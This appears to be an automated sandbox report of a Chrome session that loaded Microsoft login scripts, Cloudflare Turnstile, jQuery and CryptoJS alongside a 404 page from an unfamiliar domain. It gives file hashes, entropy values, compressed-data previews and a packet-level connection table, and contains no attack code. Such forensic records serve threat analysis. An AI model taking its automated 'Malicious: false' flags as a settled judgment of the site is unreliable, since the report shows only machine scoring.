                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                Category:downloaded
                                                                Size (bytes):61052
                                                                Entropy (8bit):7.996159932827634
                                                                Encrypted:true
                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):315
                                                                Entropy (8bit):5.0572271090563765
                                                                Encrypted:false
                                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://1800-web.com/favicon.ico
                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://login.live.com/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                Category:dropped
                                                                Size (bytes):61052
                                                                Entropy (8bit):7.996159932827634
                                                                Encrypted:true
                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:downloaded
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                Category:downloaded
                                                                Size (bytes):116345
                                                                Entropy (8bit):7.997378915283506
                                                                Encrypted:true
                                                                SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47520)
                                                                Category:downloaded
                                                                Size (bytes):47521
                                                                Entropy (8bit):5.3981340461317835
                                                                Encrypted:false
                                                                SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                MD5:7C92EC9D1395055CE0405A32607C7291
                                                                SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:dropped
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                Category:dropped
                                                                Size (bytes):116345
                                                                Entropy (8bit):7.997378915283506
                                                                Encrypted:true
                                                                SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                Category:dropped
                                                                Size (bytes):49911
                                                                Entropy (8bit):7.994516776763163
                                                                Encrypted:true
                                                                SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 73 x 84, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.9493867947401995
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPlMrtls8oZxl/k4E08up:6v/lhPuWf7Tp
                                                                MD5:58420867980BAA7B245D1D85389E0014
                                                                SHA1:BEC1C52E944A49D879088E14A7A1389C92D0E0BC
                                                                SHA-256:5692A6E532386C751D6B6442D02CA37C8212537F50A880DBD1FDD4C22015E813
                                                                SHA-512:7F2B38587653158DC98673A97926F4AD20B12BC9CB9EE655D81F68E5AD764DA0C2F3AC5E66D47615DE8082473FE73AE49F135E49798571CC4A5F4CE7595C4A44
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8fffc2a2e94d0f6c/1736544544923/lbf-aarKlszHGWE
                                                                Preview:.PNG........IHDR...I...T.....AY......IDAT.....$.....IEND.B`.
                                                                No static file info
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 10, 2025 22:28:42.366214037 CET49671443192.168.2.8204.79.197.203
                                                                Jan 10, 2025 22:28:42.709909916 CET4967780192.168.2.8192.229.211.108
                                                                Jan 10, 2025 22:28:50.772476912 CET49676443192.168.2.852.182.143.211
                                                                Jan 10, 2025 22:28:53.373575926 CET4967780192.168.2.8192.229.211.108
                                                                Jan 10, 2025 22:28:55.915373087 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:55.915463924 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:55.915679932 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:55.915896893 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:55.915930033 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:56.557934999 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:56.558305979 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:56.558341980 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:56.559710026 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:56.559786081 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:56.561088085 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:56.561166048 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:56.607671022 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:56.607723951 CET44349713142.250.186.36192.168.2.8
                                                                Jan 10, 2025 22:28:56.654558897 CET49713443192.168.2.8142.250.186.36
                                                                Jan 10, 2025 22:28:57.529282093 CET4971680192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.529416084 CET4971780192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.534118891 CET8049716124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:57.534220934 CET4971680192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.534229040 CET8049717124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:57.534353971 CET4971780192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.548686028 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.548722029 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:57.548988104 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.549185991 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:57.549209118 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.613694906 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.613960028 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:58.613990068 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.614906073 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.614967108 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:58.619668007 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:58.619796038 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.619833946 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:58.663331032 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.666701078 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:58.666716099 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:58.720092058 CET49718443192.168.2.8124.217.248.8
                                                                Jan 10, 2025 22:28:59.155936003 CET44349718124.217.248.8192.168.2.8
                                                                Jan 10, 2025 22:28:59.156107903 CET44349718124.217.248.8192.168.2.8
